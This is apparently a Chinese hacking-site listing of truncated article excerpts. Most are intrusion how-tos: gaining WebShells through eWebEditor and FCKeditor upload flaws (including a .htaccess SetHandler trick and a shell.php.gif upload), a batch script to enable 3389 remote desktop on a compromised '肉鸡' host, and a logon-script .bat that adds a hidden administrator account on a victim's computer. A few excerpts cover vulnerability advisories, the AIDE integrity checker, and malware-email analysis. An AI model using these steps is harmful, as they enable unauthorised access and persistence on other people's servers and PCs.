2022年04月20日
站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 漏洞利用 利用eWebEditor获得WebShell的步骤大致如下: 1.确定
2022年04月20日
很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时,会发现在连接对方机器后,无法像内网计算机那样可以互传文件,这在很大程度上使入侵后的攻击大打折扣,其实打上微软自家的“补丁”就可以解决这个问题。 在此,笔者就要为大家介绍一下服务器端和客户端的配置方法,让大家能够通过3389终端服务,实现终端机器与本地机器的文件互传。 服务器端(被攻击方) 首先,在http://www.sixvee.com/520yy/cpcw/rdp.rar下载补丁包,其中包含rdpclip.exe、fxfr
2022年04月20日
怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用:1,打开记事本,编辑内容如下:echo [Components] ˃ c:\sql echo TSEnable = on ˃˃ c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05地址
2022年04月20日
这里将向你揭示黑客入侵Windows XP操作系统常用的七种方法。 第一招、屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。 提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl Alt Del”的组合键,因此需要设置完成之后测试一下
2022年04月20日
1.创建一个.htaccess文件,内容如下: SetHandler application/x-httpd-php 2.上传shell www.badguest.cn FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html 这是上传地址,然后将你的webshell文件改后缀shell.php.gif
2022年04月20日
任何系统管理员想要在其生产服务器上最先部署的安全措施之一就是检测文件篡改的机制――不法分子篡改的不仅仅是文件内容,还有文件属性。AIDE(全称“高级入侵检测环境”)是一种基于主机的开源入侵检测系统。AIDE通过检查许多文件属性的不一致性来检查系统二进制文件和基本配置文件的完整性,这些文件属性包括权限、文件类型、索引节点(inode)、链接数量、链接名称、用户、用户组、文件大小、块计数、修改时间、访问时间、创建时间、访问控制列表(acl)、SELinux安全上下文、xattrs以及md5/sha校
2022年04月20日
操作步骤: 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容: @echo off net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码; net localgroup administrators xixi /add 3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat; 4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logo
2022年04月20日
无奈到了自己这里今天下午又碰到个一样的站 纠结···不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)此后台默认的账号密码是 admin admin , ITlearner ITlearner先进后台来到修改配置界面 保存源文件到本地本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100 下边是修改后的截图然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/20
2022年04月20日
受影响系统:GE Fanuc CIMPLICITY HMI 6.1受影响系统: Persits XUpload 3.0.0.4 Persits XUpload 2.1.0.1 描述: 受影响系统: IrfanView IrfanView 4.10 描述: IrfanView是一款快速、免费的图像查看器、浏览器、转换器。 IrfanView的FlashPix插件(fpx.dll)在处理FlashPix(*.fpx)文件时存在堆溢出漏洞,如果用户受骗打开了特制的FlashPix文件的话,就可能触发堆
2022年04月20日
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱。这一切要从一次恶意邮件攻击活动开始。下图为我们最近监测到的一个以恶意文件为发送附件的邮件攻击,请注意邮件信息中的英语写作水平是多么差劲,其实,这也是恶意邮件的一个特点,还请收件人提高警惕。邮件样本在这封邮件中其附件以“.doc”文件扩展名结尾,但其实这是一个RTF(富文本)格式文件,文件被嵌入了一个精心构造的cve-2010-3333漏洞利用脚本,漏洞